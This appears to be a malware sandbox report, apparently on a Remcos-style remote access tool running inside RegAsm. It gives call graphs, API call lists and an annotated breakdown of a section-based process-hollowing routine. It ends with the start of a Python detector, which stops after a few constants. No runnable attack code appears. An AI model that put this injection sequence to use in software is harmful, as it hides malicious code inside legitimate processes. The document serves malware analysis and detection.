54636->54638 54651 44ae0a 54636->54651 54637->54639 54656 448c33 54638->54656 54639->54636 54639->54651 54643 44ade1 54646 448c33 _strftime 11 API calls 54643->54646 54643->54651 54644 44ae19 54645 4461b8 ___crtLCMapStringA 21 API calls 54644->54645 54650 44ae3a __alloca_probe_16 54644->54650 54645->54650 54646->54651 54647 44aeaf 54664 435ecd 20 API calls _free 54647->54664 54649 448c33 _strftime 11 API calls 54652 44ae8e 54649->54652 54650->54647 54650->54649 54665 435ecd 20 API calls _free 54651->54665 54652->54647 54653 44ae9d WideCharToMultiByte 54652->54653 54653->54647 54654 44aedd 54653->54654 54666 435ecd 20 API calls _free 54654->54666 54657 44854a _free 5 API calls 54656->54657 54658 448c5a 54657->54658 54661 448c63 54658->54661 54667 448cbb 10 API calls 3 library calls 54658->54667 54660 448ca3 LCMapStringW 54660->54661 54662 43502b __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 54661->54662 54663 448cb5 54662->54663 54663->54643 54663->54644 54663->54651 54664->54651 54665->54633 54666->54651 54667->54660 54669 41cc20 LoadLibraryA GetProcAddress 54668->54669 54670 41cc10 GetModuleHandleA GetProcAddress 54668->54670 54671 41cc49 44 API calls 54669->54671 54672 41cc39 LoadLibraryA GetProcAddress 54669->54672 54670->54669 54671->54192 54672->54671 54987 41b539 FindResourceA 54673->54987 54676 43bda0 new 21 API calls 54677 40f428 ctype 54676->54677 54678 4020b7 28 API calls 54677->54678 54679 40f443 54678->54679 54680 401fe2 28 API calls 54679->54680 54681 40f44e 54680->54681 54682 401fd8 11 API calls 54681->54682 54683 40f457 54682->54683 54684 43bda0 new 21 API calls 54683->54684 54685 40f468 ctype 54684->54685 54990 406e13 54685->54990 54687 40f49b 54687->54194 54689 40fb5e 54688->54689 54691 40fb65 54688->54691 54993 402163 11 API calls 54689->54993 54691->54202 54994 401fab 54692->54994 54883->54210 54884->54218 54885->54222 54888 4020df 11 API calls 54887->54888 54889 406c65 54888->54889 54890 4032a0 28 API calls 54889->54890 
54891 406c82 54890->54891 54891->54243 54893 40ebdf 54892->54893 54894 4135ae RegQueryValueExA RegCloseKey 54892->54894 54893->54240 54893->54257 54894->54893 54895->54247 54985->54267 54988 41b556 LoadResource LockResource SizeofResource 54987->54988 54989 40f419 54987->54989 54988->54989 54989->54676 54991 4020b7 28 API calls 54990->54991 54992 406e27 54991->54992 54992->54687 54993->54691 55355 4129da 55356 4129ec 55355->55356 55357 4041a2 28 API calls 55356->55357 55358 4129ff 55357->55358 55359 4020f6 28 API calls 55358->55359 55360 412a0e 55359->55360 55361 4020f6 28 API calls 55360->55361 55362 412a1d 55361->55362 55363 41beac 28 API calls 55362->55363 55364 412a26 55363->55364 55365 412ace 55364->55365 55366 401e65 22 API calls 55364->55366 55367 401e8d 11 API calls 55365->55367 55368 412a3d 55366->55368 55369 412ad7 55367->55369 55371 4020f6 28 API calls 55368->55371 55370 401fd8 11 API calls 55369->55370 55372 412ae0 55370->55372 55373 412a48 55371->55373 55374 401fd8 11 API calls 55372->55374 55375 401e65 22 API calls 55373->55375 55376 412ae8 55374->55376 55377 412a53 55375->55377 55378 4020f6 28 API calls 55377->55378 55379 412a5e 55378->55379 55380 401e65 22 API calls 55379->55380 55381 412a69 55380->55381 55382 4020f6 28 API calls 55381->55382 55383 412a74 55382->55383 55384 401e65 22 API calls 55383->55384 55385 412a7f 55384->55385 55386 4020f6 28 API calls 55385->55386 55387 412a8a 55386->55387 55388 401e65 22 API calls 55387->55388 55389 412a95 55388->55389 55390 4020f6 28 API calls 55389->55390 55391 412aa0 55390->55391 55392 401e65 22 API calls 55391->55392 55393 412aae 55392->55393 55394 4020f6 28 API calls 55393->55394 55395 412ab9 55394->55395 55399 412aef GetModuleFileNameW 55395->55399 55398 404e26 99 API calls 55398->55365 55400 4020df 11 API calls 55399->55400 55401 412b1a 55400->55401 55402 4020df 11 API calls 55401->55402 55403 412b26 55402->55403 55404 4020df 11 API calls 55403->55404 55427 412b32 55404->55427 55405 40da23 32 API calls 
55405->55427 55406 401fd8 11 API calls 55406->55427 55407 41ba09 43 API calls 55407->55427 55408 4185a3 31 API calls 55408->55427 55409 412c58 Sleep 55409->55427 55410 40417e 28 API calls 55410->55427 55411 4042fc 84 API calls 55411->55427 55412 40431d 28 API calls 55412->55427 55413 401f09 11 API calls 55413->55427 55414 412cfa Sleep 55414->55427 55415 403014 28 API calls 55415->55427 55416 412d9c Sleep 55416->55427 55417 41c516 32 API calls 55417->55427 55418 412dff DeleteFileW 55418->55427 55419 412e36 DeleteFileW 55419->55427 55420 412e61 55422 412e72 DeleteFileW 55420->55422 55420->55427 55435 401f09 11 API calls 55420->55435 55439 412eff 55420->55439 55421 412e88 Sleep 55421->55427 55422->55427 55423 412f01 55424 401f09 11 API calls 55423->55424 55425 412f0d 55424->55425 55426 401f09 11 API calls 55425->55426 55428 412f19 55426->55428 55427->55405 55427->55406 55427->55407 55427->55408 55427->55409 55427->55410 55427->55411 55427->55412 55427->55413 55427->55414 55427->55415 55427->55416 55427->55417 55427->55418 55427->55419 55427->55420 55427->55421 55427->55423 55431 412ecd Sleep 55427->55431 55429 401f09 11 API calls 55428->55429 55430 412f25 55429->55430 55432 40b93f 28 API calls 55430->55432 55433 401f09 11 API calls 55431->55433 55434 412f38 55432->55434 55433->55420 55436 4020f6 28 API calls 55434->55436 55435->55420 55437 412f58 55436->55437 55546 413268 55437->55546 55439->55430 55441 401f09 11 API calls 55442 412f6f 55441->55442 55443 4130e3 55442->55443 55444 412f8f 55442->55444 55445 41bdaf 28 API calls 55443->55445 55446 41bdaf 28 API calls 55444->55446 55447 4130ec 55445->55447 55448 412f9b 55446->55448 55449 402f31 28 API calls 55447->55449 55450 41bc1f 28 API calls 55448->55450 55451 413123 55449->55451 55452 412fb5 55450->55452 55453 402f10 28 API calls 55451->55453 55454 402f31 28 API calls 55452->55454 55455 413132 55453->55455 55456 412fe5 55454->55456 55457 402f10 28 API calls 55455->55457 55458 402f10 28 API calls 55456->55458 55459 
41313e 55457->55459 55460 412ff4 55458->55460 55461 402f10 28 API calls 55459->55461 55462 402f10 28 API calls 55460->55462 55463 41314d 55461->55463 55464 413003 55462->55464 55465 402f10 28 API calls 55463->55465 55466 402f10 28 API calls 55464->55466 55467 41315c 55465->55467 55468 413012 55466->55468 55469 402f10 28 API calls 55467->55469 55470 402f10 28 API calls 55468->55470 55472 41316b 55469->55472 55471 413021 55470->55471 55474 402f10 28 API calls 55471->55474 55473 402f10 28 API calls 55472->55473 55475 41317a 55473->55475 55476 41302d 55474->55476 55477 402ea1 28 API calls 55475->55477 55478 402f10 28 API calls 55476->55478 55479 413184 55477->55479 55480 413039 55478->55480 55481 404aa1 61 API calls 55479->55481 55482 402ea1 28 API calls 55480->55482 55483 413191 55481->55483 55484 413048 55482->55484 55485 401fd8 11 API calls 55483->55485 55486 402f10 28 API calls 55484->55486 55487 41319d 55485->55487 55488 413054 55486->55488 55489 401fd8 11 API calls 55487->55489 55490 402ea1 28 API calls 55488->55490 55491 4131a9 55489->55491 55492 41305e 55490->55492 55493 401fd8 11 API calls 55491->55493 55494 404aa1 61 API calls 55492->55494 55495 4131b5 55493->55495 55496 41306b 55494->55496 55497 401fd8 11 API calls 55495->55497 55498 401fd8 11 API calls 55496->55498 55499 4131c1 55497->55499 55500 413074 55498->55500 55501 401fd8 11 API calls 55499->55501 55502 401fd8 11 API calls 55500->55502 55504 4131ca 55501->55504 55503 41307d 55502->55503 55506 401fd8 11 API calls 55503->55506 55505 401fd8 11 API calls 55504->55505 55507 4131d3 55505->55507 55508 413086 55506->55508 55509 401fd8 11 API calls 55507->55509 55510 401fd8 11 API calls 55508->55510 55511 4130d7 55509->55511 55512 41308f 55510->55512 55514 401fd8 11 API calls 55511->55514 55513 401fd8 11 API calls 55512->55513 55515 41309b 55513->55515 55516 4131e5 55514->55516 55517 401fd8 11 API calls 55515->55517 55518 401f09 11 API calls 55516->55518 55519 4130a7 55517->55519 55520 4131f1 55518->55520 
55521 401fd8 11 API calls 55519->55521 55522 401fd8 11 API calls 55520->55522 55523 4130b3 55521->55523 55524 4131fd 55522->55524 55525 401fd8 11 API calls 55523->55525 55526 401fd8 11 API calls 55524->55526 55527 4130bf 55525->55527 55528 413209 55526->55528 55529 401fd8 11 API calls 55527->55529 55530 401fd8 11 API calls 55528->55530 55531 4130cb 55529->55531 55532 413215 55530->55532 55533 401fd8 11 API calls 55531->55533 55534 401fd8 11 API calls 55532->55534 55533->55511 55535 413221 55534->55535 55536 401fd8 11 API calls 55535->55536 55537 41322d 55536->55537 55538 401fd8 11 API calls 55537->55538 55539 413239 55538->55539 55540 401fd8 11 API calls 55539->55540 55541 413245 55540->55541 55542 401fd8 11 API calls 55541->55542 55543 413251 55542->55543 55544 401fd8 11 API calls 55543->55544 55545 412abe 55544->55545 55545->55398 55547 4132a6 55546->55547 55549 413277 55546->55549 55548 4132b5 55547->55548 55558 10001c5b 55547->55558 55550 40417e 28 API calls 55548->55550 55562 411d2d 55549->55562 55551 4132c1 55550->55551 55553 401fd8 11 API calls 55551->55553 55556 412f63 55553->55556 55556->55441 55559 10001c6b ___scrt_fastfail 55558->55559 55566 100012ee 55559->55566 55561 10001c87 55561->55548 55608 411d39 55562->55608 55565 411fa2 22 API calls new 55565->55547 55567 10001324 ___scrt_fastfail 55566->55567 55568 100013b7 GetEnvironmentVariableW 55567->55568 55592 100010f1 55568->55592 55571 100010f1 51 API calls 55572 10001465 55571->55572 55573 100010f1 51 API calls 55572->55573 55574 10001479 55573->55574 55575 100010f1 51 API calls 55574->55575 55576 1000148d 55575->55576 55577 100010f1 51 API calls 55576->55577 55578 100014a1 55577->55578 55579 100010f1 51 API calls 55578->55579 55580 100014b5 lstrlenW 55579->55580 55581 100014d2 55580->55581 55582 100014d9 lstrlenW 55580->55582 55581->55561 55583 100010f1 51 API calls 55582->55583 55584 10001501 lstrlenW lstrcatW 55583->55584 55585 100010f1 51 API calls 55584->55585 55586 10001539 lstrlenW lstrcatW 
55585->55586 55587 100010f1 51 API calls 55586->55587 55588 1000156b lstrlenW lstrcatW 55587->55588 55589 100010f1 51 API calls 55588->55589 55590 1000159d lstrlenW lstrcatW 55589->55590 55591 100010f1 51 API calls 55590->55591 55591->55581 55593 10001118 ___scrt_fastfail 55592->55593 55594 10001129 lstrlenW 55593->55594 55605 10002c40 55594->55605 55597 10001177 lstrlenW FindFirstFileW 55599 100011a0 55597->55599 55600 100011e1 55597->55600 55598 10001168 lstrlenW 55598->55597 55601 100011c7 FindNextFileW 55599->55601 55602 100011aa 55599->55602 55600->55571 55601->55599 55604 100011da FindClose 55601->55604 55602->55601 55607 10001000 51 API calls ___scrt_fastfail 55602->55607 55604->55600 55606 10001148 lstrcatW lstrlenW 55605->55606 55606->55597 55606->55598 55607->55602 55643 4117d7 55608->55643 55610 411d57 55611 411d6d SetLastError 55610->55611 55612 4117d7 SetLastError 55610->55612 55619 411d35 55610->55619 55611->55619 55613 411d8a 55612->55613 55613->55611 55615 411dac GetNativeSystemInfo 55613->55615 55613->55619 55616 411df2 55615->55616 55628 411dff SetLastError 55616->55628 55646 411cde VirtualAlloc 55616->55646 55619->55565 55620 411e22 55621 411e47 GetProcessHeap HeapAlloc 55620->55621 55672 411cde VirtualAlloc 55620->55672 55623 411e70 55621->55623 55624 411e5e 55621->55624 55627 4117d7 SetLastError 55623->55627 55673 411cf5 VirtualFree 55624->55673 55625 411e3a 55625->55621 55625->55628 55629 411eb9 55627->55629 55628->55619 55630 411f6b 55629->55630 55647 411cde VirtualAlloc 55629->55647 55674 4120b2 GetProcessHeap HeapFree 55630->55674 55633 411ed2 ctype 55648 4117ea 55633->55648 55635 411efe 55635->55630 55652 411b9a 55635->55652 55639 411f36 55639->55619 55639->55630 55668 1000220c 55639->55668 55640 411f5c 55640->55619 55641 411f60 SetLastError 55640->55641 55641->55630 55644 4117e6 55643->55644 55645 4117db SetLastError 55643->55645 55644->55610 55645->55610 55646->55620 55647->55633 55649 4118c0 55648->55649 55651 411816 ctype 
___scrt_fastfail 55648->55651 55649->55635 55650 4117d7 SetLastError 55650->55651 55651->55649 55651->55650 55653 411ca5 55652->55653 55654 411bbb IsBadReadPtr 55652->55654 55653->55630 55662 41198a 55653->55662 55654->55653 55658 411bd5 55654->55658 55657 411cbd SetLastError 55657->55653 55658->55653 55658->55657 55659 411ca7 SetLastError 55658->55659 55660 411c8a IsBadReadPtr 55658->55660 55675 440f5d 55658->55675 55659->55653 55660->55653 55660->55658 55666 4119b0 55662->55666 55663 411a99 55664 4118ed VirtualProtect 55663->55664 55665 411aab 55664->55665 55665->55639 55666->55663 55666->55665 55690 4118ed 55666->55690 55669 10002215 55668->55669 55670 1000221a dllmain_dispatch 55668->55670 55694 100022b1 GetSystemTimeAsFileTime GetCurrentThreadId GetCurrentProcessId QueryPerformanceCounter ___get_entropy 55669->55694 55670->55640 55672->55625 55673->55628 55674->55619 55676 446206 55675->55676 55677 446213 55676->55677 55678 44621e 55676->55678 55679 4461b8 ___crtLCMapStringA 21 API calls 55677->55679 55680 446226 55678->55680 55686 44622f __Getctype 55678->55686 55684 44621b 55679->55684 55681 446802 _free 20 API calls 55680->55681 55681->55684 55682 446234 55688 44062d 20 API calls _free 55682->55688 55683 446259 HeapReAlloc 55683->55684 55683->55686 55684->55658 55686->55682 55686->55683 55689 443001 7 API calls 2 library calls 55686->55689 55688->55684 55689->55686 55691 4118f6 55690->55691 55693 4118fe 55690->55693 55691->55666 55692 411971 VirtualProtect 55692->55691 55693->55691 55693->55692 55694->55670 55695 42f97e 55696 42f989 55695->55696 55698 42f99d 55696->55698 55699 432f7f 55696->55699 55698->55698 55700 432f8a 55699->55700 55701 432f8e 55699->55701 55700->55698 55702 440f5d 22 API calls 55701->55702 55702->55700 55703 40165e 55704 401666 55703->55704 55705 401669 55703->55705 55706 4016a8 55705->55706 55708 401696 55705->55708 55707 43455e new 22 API calls 55706->55707 55709 40169c 55707->55709 55710 43455e new 22 API calls 55708->55710 
55710->55709 55711 426cdc 55716 426d59 send 55711->55716 55717 10001f3f 55718 10001f4b ___DestructExceptionObject 55717->55718 55735 1000247c 55718->55735 55720 10001f52 55721 10002041 55720->55721 55722 10001f7c 55720->55722 55729 10001f57 ___scrt_is_nonwritable_in_current_image 55720->55729 55751 10002639 IsProcessorFeaturePresent IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter ___scrt_fastfail 55721->55751 55746 100023de IsProcessorFeaturePresent IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 55722->55746 55725 10002048 55726 10001f8b __RTC_Initialize 55726->55729 55747 100022fc RtlInitializeSListHead 55726->55747 55728 10001f99 ___scrt_initialize_default_local_stdio_options 55748 100046c5 5 API calls _ValidateLocalCookies 55728->55748 55731 10001fad 55731->55729 55749 100023b3 IsProcessorFeaturePresent ___isa_available_init ___scrt_release_startup_lock 55731->55749 55733 10001fb8 55733->55729 55750 10004669 5 API calls _ValidateLocalCookies 55733->55750 55736 10002485 55735->55736 55752 10002933 IsProcessorFeaturePresent 55736->55752 55738 10002491 55753 100034ea 55738->55753 55740 10002496 55745 1000249a 55740->55745 55762 100053c8 55740->55762 55743 100024b1 55743->55720 55745->55720 55746->55726 55747->55728 55748->55731 55749->55733 55750->55729 55751->55725 55752->55738 55754 100034ef ___vcrt_initialize_winapi_thunks 55753->55754 55766 10003936 6 API calls 2 library calls 55754->55766 55756 100034f9 55757 100034fd 55756->55757 55767 100038e8 55756->55767 55757->55740 55759 10003505 55760 10003510 55759->55760 55775 10003972 RtlDeleteCriticalSection 55759->55775 55760->55740 55794 10007457 55762->55794 55765 10003529 7 API calls 3 library calls 55765->55745 55766->55756 55776 10003af1 55767->55776 55770 100038fd 55770->55759 55772 1000390b 55773 10003918 55772->55773 55782 1000391b 5 API calls ___vcrt_FlsFree 55772->55782 55773->55759 55775->55757 55783 10003a82 55776->55783 55778 10003b0b 55779 10003b24 
TlsAlloc 55778->55779 55780 100038f2 55778->55780 55780->55770 55781 10003ba2 5 API calls try_get_function 55780->55781 55781->55772 55782->55770 55784 10003aaa 55783->55784 55786 10003aa6 __crt_fast_encode_pointer 55783->55786 55784->55786 55787 100039be 55784->55787 55786->55778 55788 100039cd try_get_first_available_module 55787->55788 55789 100039ea LoadLibraryExW 55788->55789 55791 10003a60 FreeLibrary 55788->55791 55792 10003a77 55788->55792 55793 10003a38 LoadLibraryExW 55788->55793 55789->55788 55790 10003a05 GetLastError 55789->55790 55790->55788 55791->55788 55792->55786 55793->55788 55797 10007470 55794->55797 55795 10002ada _ValidateLocalCookies 5 API calls 55796 100024a3 55795->55796 55796->55743 55796->55765 55797->55795 55798 10005bff 55806 10005d5c 55798->55806 55802 10005c1b 55803 10005c28 55802->55803 55814 10005c2b 10 API calls 55802->55814 55805 10005c13 55807 10005c45 _abort 4 API calls 55806->55807 55808 10005d83 55807->55808 55809 10005d9b TlsAlloc 55808->55809 55810 10005d8c 55808->55810 55809->55810 55811 10002ada _ValidateLocalCookies 5 API calls 55810->55811 55812 10005c09 55811->55812 55812->55805 55813 10005b7a 19 API calls 2 library calls 55812->55813 55813->55802 55814->55805

Control-flow Graph

APIs
• LoadLibraryA.KERNEL32(Psapi), ref: 0041CBF6
• GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CBFF
• GetModuleHandleA.KERNEL32(Kernel32,GetProcessImageFileNameW,?,?,?,?,0040EA1C), ref: 0041CC16
• GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CC19
• LoadLibraryA.KERNEL32(shcore), ref: 0041CC2B
• GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CC2E
• LoadLibraryA.KERNEL32(user32), ref: 0041CC3F
• GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CC42
• LoadLibraryA.KERNEL32(ntdll), ref: 0041CC54
• GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CC57
• LoadLibraryA.KERNEL32(kernel32), ref: 0041CC63
• GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CC66
• GetModuleHandleA.KERNEL32(kernel32,IsWow64Process,?,?,?,?,0040EA1C), ref: 0041CC77
• GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CC7A
• GetModuleHandleA.KERNEL32(kernel32,GetComputerNameExW,?,?,?,?,0040EA1C), ref: 0041CC8B
• GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CC8E
• LoadLibraryA.KERNEL32(Shell32), ref: 0041CC9F
• GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CCA2
• GetModuleHandleA.KERNEL32(kernel32,SetProcessDEPPolicy,?,?,?,?,0040EA1C), ref: 0041CCB3
• GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CCB6
• GetModuleHandleA.KERNEL32(user32,EnumDisplayDevicesW,?,?,?,?,0040EA1C), ref: 0041CCC7
• GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CCCA
• GetModuleHandleA.KERNEL32(user32,EnumDisplayMonitors,?,?,?,?,0040EA1C), ref: 0041CCDB
• GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CCDE
• GetModuleHandleA.KERNEL32(user32,GetMonitorInfoW,?,?,?,?,0040EA1C), ref: 0041CCEF
• GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CCF2
• GetModuleHandleA.KERNEL32(kernel32,GetSystemTimes,?,?,?,?,0040EA1C), ref: 0041CD03
• GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CD06
• LoadLibraryA.KERNEL32(Shlwapi), ref: 0041CD14
• GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CD17
• LoadLibraryA.KERNEL32(kernel32), ref: 0041CD28
• GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CD2B
• GetModuleHandleA.KERNEL32(ntdll,NtSuspendProcess,?,?,?,?,0040EA1C), ref: 0041CD38
                                                                                • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CD3B
                                                                                • GetModuleHandleA.KERNEL32(ntdll,NtResumeProcess,?,?,?,?,0040EA1C), ref: 0041CD48
                                                                                • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CD4B
                                                                                • LoadLibraryA.KERNEL32(Iphlpapi), ref: 0041CD5D
                                                                                • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CD60
                                                                                • LoadLibraryA.KERNEL32(Iphlpapi), ref: 0041CD6D
                                                                                • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CD70
                                                                                • GetModuleHandleA.KERNEL32(ntdll,NtQueryInformationProcess,?,?,?,?,0040EA1C), ref: 0041CD81
                                                                                • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CD84
                                                                                • GetModuleHandleA.KERNEL32(kernel32,GetFinalPathNameByHandleW,?,?,?,?,0040EA1C), ref: 0041CD95
                                                                                • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CD98
                                                                                • LoadLibraryA.KERNEL32(Rstrtmgr), ref: 0041CDAA
                                                                                • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CDAD
                                                                                • LoadLibraryA.KERNEL32(Rstrtmgr), ref: 0041CDBA
                                                                                • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CDBD
                                                                                • LoadLibraryA.KERNEL32(Rstrtmgr), ref: 0041CDCA
                                                                                • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CDCD
                                                                                • LoadLibraryA.KERNEL32(Rstrtmgr), ref: 0041CDDA
                                                                                • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CDDD
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000E.00000002.1041828319.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                 • Associated: 0000000E.00000002.1041828319.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                                                 • Associated: 0000000E.00000002.1041828319.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: AddressProc$LibraryLoad$HandleModule
                                                                                • String ID: EnumDisplayDevicesW$EnumDisplayMonitors$GetComputerNameExW$GetConsoleWindow$GetExtendedTcpTable$GetExtendedUdpTable$GetFinalPathNameByHandleW$GetMonitorInfoW$GetProcessImageFileNameW$GetSystemTimes$GlobalMemoryStatusEx$Iphlpapi$IsUserAnAdmin$IsWow64Process$Kernel32$NtQueryInformationProcess$NtResumeProcess$NtSuspendProcess$NtUnmapViewOfSection$Psapi$RmEndSession$RmGetList$RmRegisterResources$RmStartSession$Rstrtmgr$SetProcessDEPPolicy$SetProcessDpiAwareness$Shell32$Shlwapi$kernel32$ntdll$shcore$user32
                                                                                • API String ID: 4236061018-3687161714
                                                                                • Opcode ID: 6b21e851a0d3a51eeec0044f2aae63c374cf6436741b915ef551e22e35f3a136
                                                                                • Instruction ID: 87b5fa294a9840a4da0a94e675c49188b16ea4214af7843bc20054d8537ab592
                                                                                • Opcode Fuzzy Hash: 6b21e851a0d3a51eeec0044f2aae63c374cf6436741b915ef551e22e35f3a136
                                                                                • Instruction Fuzzy Hash: 06419AA0E8035879DA107BB65D8DE3B3E5CD9857953614837B05C93550FBBCDC408EAE

                                                                                 Control-flow Graph (basic blocks of the function at 41812a: block id, address range, calls in the block, successor blocks)
                                                                                 • 448  41812a-418153 -> 449
                                                                                 • 449  418157-4181be  GetModuleHandleA GetProcAddress (4 pairs) -> 450, 451
                                                                                 • 450  4181c4-4181cb -> 451, 453
                                                                                 • 451  4184bb -> 452
                                                                                 • 452  4184bd-4184c7 (no successors)
                                                                                 • 453  4181d1-4181d8 -> 451, 454
                                                                                 • 454  4181de-4181e0 -> 451, 455
                                                                                 • 455  4181e6-418213  call 436f10 * 2 -> 451, 460
                                                                                 • 460  418219-418224 -> 451, 461
                                                                                 • 461  41822a-41825a  CreateProcessW -> 462, 463
                                                                                 • 462  418260-418288  VirtualAlloc GetThreadContext -> 464, 465
                                                                                 • 463  4184b5  GetLastError -> 451
                                                                                 • 464  41847f-4184b3  VirtualFree GetCurrentProcess NtUnmapViewOfSection NtClose TerminateProcess -> 451
                                                                                 • 465  41828e-4182ae  ReadProcessMemory -> 464, 466
                                                                                 • 466  4182b4-4182d6  NtCreateSection -> 464, 467
                                                                                 • 467  4182dc-4182e9 -> 468, 469
                                                                                 • 468  4182eb-4182f6  NtUnmapViewOfSection -> 469
                                                                                 • 469  4182fc-41831e  NtMapViewOfSection -> 470, 471
                                                                                 • 470  418320-41835d  VirtualFree NtClose TerminateProcess -> 449, 472
                                                                                 • 471  418368-41838f  GetCurrentProcess NtMapViewOfSection -> 464, 473
                                                                                 • 472  418363 -> 451
                                                                                 • 473  418395-418399 -> 474, 475
                                                                                 • 474  4183a2-4183c0  call 436990 -> 478, 479
                                                                                 • 475  41839b-41839f -> 474
                                                                                 • 478  418402-41840b -> 480, 481
                                                                                 • 479  4183c2-4183d0 -> 482
                                                                                 • 480  41842b-41842f -> 484, 485
                                                                                 • 481  41840d-418413 -> 480, 483
                                                                                 • 482  4183d2-4183f5  call 436990 -> 491
                                                                                 • 483  418415-418428  call 41853e -> 480
                                                                                 • 484  418431-41844e  WriteProcessMemory -> 464, 489
                                                                                 • 485  418454-41846b  SetThreadContext -> 464, 490
                                                                                 • 489  418450 -> 485
                                                                                 • 490  41846d-418479  ResumeThread -> 464, 493
                                                                                 • 491  4183f7-4183fe -> 478
                                                                                 • 493  41847b-41847d -> 452
                                                                                APIs
                                                                                • GetModuleHandleA.KERNEL32(ntdll,ZwCreateSection,00000000,00000000), ref: 00418171
                                                                                • GetProcAddress.KERNEL32(00000000), ref: 00418174
                                                                                • GetModuleHandleA.KERNEL32(ntdll,ZwMapViewOfSection), ref: 00418185
                                                                                • GetProcAddress.KERNEL32(00000000), ref: 00418188
                                                                                • GetModuleHandleA.KERNEL32(ntdll,ZwUnmapViewOfSection), ref: 00418199
                                                                                • GetProcAddress.KERNEL32(00000000), ref: 0041819C
                                                                                • GetModuleHandleA.KERNEL32(ntdll,ZwClose), ref: 004181AD
                                                                                • GetProcAddress.KERNEL32(00000000), ref: 004181B0
                                                                                • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000004,00000000,00000000,?,?), ref: 00418252
                                                                                • VirtualAlloc.KERNEL32(00000000,00000004,00001000,00000004), ref: 0041826A
                                                                                • GetThreadContext.KERNEL32(?,00000000), ref: 00418280
                                                                                • ReadProcessMemory.KERNEL32(?,?,?,00000004,?), ref: 004182A6
                                                                                • NtCreateSection.NTDLL(?,000F001F,00000000,?,00000040,08000000,00000000), ref: 004182CE
                                                                                • NtUnmapViewOfSection.NTDLL(?,?), ref: 004182F6
                                                                                • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,?,00000001,00000000,00000040), ref: 00418316
                                                                                • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 00418328
                                                                                • NtClose.NTDLL(?), ref: 00418332
                                                                                • TerminateProcess.KERNEL32(?,00000000), ref: 0041833C
                                                                                • GetCurrentProcess.KERNEL32(?,00000000,00000000,00000000,?,00000001,00000000,00000040), ref: 0041837C
                                                                                • NtMapViewOfSection.NTDLL(?,00000000), ref: 00418387
                                                                                • WriteProcessMemory.KERNEL32(?,?,?,00000004,00000000), ref: 00418446
                                                                                • SetThreadContext.KERNEL32(?,00000000), ref: 00418463
                                                                                • ResumeThread.KERNEL32(?), ref: 00418470
                                                                                • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 00418487
                                                                                • GetCurrentProcess.KERNEL32(?), ref: 00418492
                                                                                • NtUnmapViewOfSection.NTDLL(00000000), ref: 00418499
                                                                                • NtClose.NTDLL(?), ref: 004184A3
                                                                                • TerminateProcess.KERNEL32(?,00000000), ref: 004184AD
                                                                                • GetLastError.KERNEL32 ref: 004184B5
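                                                                                 The API list above is the section-mapping variant of process hollowing: CreateProcessW is called with dwCreationFlags 00000004 (CREATE_SUSPENDED), ReadProcessMemory follows GetThreadContext and moves 4 bytes (one 32-bit pointer), NtCreateSection is given SECTION_ALL_ACCESS (000F001F), PAGE_EXECUTE_READWRITE (00000040), SEC_COMMIT (08000000) and a null file handle, NtMapViewOfSection is called twice with protection 00000040 (the second time right after GetCurrentProcess), WriteProcessMemory writes 4 bytes back, and SetThreadContext/ResumeThread start the thread on the replaced image. Reading the arguments by position against the documented prototypes is our interpretation of the trace, not a statement the report makes. The Python below is an added example, not Joe Sandbox or Remcos code: it parses API lines in this report's format, pairs each LoadLibraryA/GetModuleHandleA with the GetProcAddress that follows it (the dynamic import resolution shown in the function whose API list ends at 0041CDDD above), and flags the hollowing sequence only when the argument values match, so a plain CreateProcessW or a read-only section view does not trigger it. The sample lines are a subset copied from this function's API list; the stage list and constant names are assumptions.

```python
import re
from dataclasses import dataclass

# Windows SDK constants referenced by the argument values in the trace
CREATE_SUSPENDED = 0x00000004       # CreateProcessW dwCreationFlags
PAGE_EXECUTE_READWRITE = 0x40       # NtCreateSection / NtMapViewOfSection protection
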